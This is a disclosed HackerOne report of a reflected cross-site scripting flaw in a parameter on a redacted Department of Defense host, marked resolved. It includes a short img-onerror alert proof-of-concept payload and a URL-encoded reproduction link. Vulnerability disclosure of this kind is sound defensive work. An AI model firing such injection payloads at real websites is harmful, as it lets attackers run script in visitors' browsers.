xss on https://███████(█████████ parameter)

Disclosed: 2021-07-29 19:39:27 By fiveguyslover To deptofdefense
Medium
Vulnerability Details
Greetings, i've found an xss on https://████████(██████████ parameter) link :████████.█████████████=%22/%3E%3Cimg%20src=x%20onerror=(alert)(1)%3E Payload : ``` "/><img src=x onerror=(alert)(1)/> ``` ████████ best regards, frenchvlad ## Impact A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. ## System Host(s) ██████ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce link :██████████████████.████████████=%22/%3E%3Cimg%20src=x%20onerror=(alert)(1)%3E ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 1143780
  • State: Closed
  • Substate: resolved
  • Upvotes: 4
Share this report